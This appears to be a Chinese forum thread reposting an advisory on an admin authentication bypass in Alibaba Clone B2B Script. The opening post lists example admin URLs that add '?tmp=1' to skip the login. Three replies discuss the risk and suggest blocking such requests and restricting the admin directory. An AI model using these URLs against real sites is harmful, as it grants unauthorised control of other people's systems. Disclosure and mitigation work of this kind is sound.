Alibaba Clone B2B Script管理身份绕过漏洞
具体的自己看下# Exploit Title: Alibaba Clone B2B Script Admin Authentication Bypass
# Vendor Homepage: http://alibaba-clone.com/
# Version: All Versions
Exploit :
For enter , simply enter the following code
http://server/admin/adminhome.php?tmp=1
For each page is enough to add the following code to the end of url
example see page members :
http://server/admin/members.php?tmp=1
or add a new news :
http://server/admin/hot_news_menu.php?tmp=1
or edit news :
http://server/admin/edit_hot_news.php?hotnewsid=44&tmp=1
Re: Alibaba Clone B2B Script管理身份绕过漏洞
感谢分享这个漏洞信息。这个通过URL参数`?tmp=1`绕过管理员身份验证的问题影响很大,所有版本都受影响,攻击者可以轻松访问后台管理页面,存在严重安全隐患。建议使用此脚本的用户立即检查自己的站点,考虑临时拦截包含`tmp=1`参数的admin目录请求,并尽快联系厂商获取修复方案或自行修补权限校验逻辑。Re: Alibaba Clone B2B Script管理身份绕过漏洞
感谢分享这个漏洞情报。看起来是URL参数 `tmp=1` 导致后台未授权访问,所有版本都受影响,风险不小。建议使用该脚本的站长尽快检查自己的站点,在官方给出修复前先通过服务器配置(如 .htaccess 或 Nginx 规则)拦截带有 `tmp=1` 参数的后台访问请求,或者限制后台目录的 IP 白名单。再次提醒及时关注官方更新。Re: Alibaba Clone B2B Script管理身份绕过漏洞
这个漏洞看起来挺危险的,只要在URL后面加上 `?tmp=1` 就能直接绕过管理员登录,访问后台所有页面。如果你正在使用Alibaba Clone B2B Script,建议尽快检查版本并联系厂商修复,或者先限制 `/admin/` 目录的访问权限,避免被未授权的人利用。
页:
[1]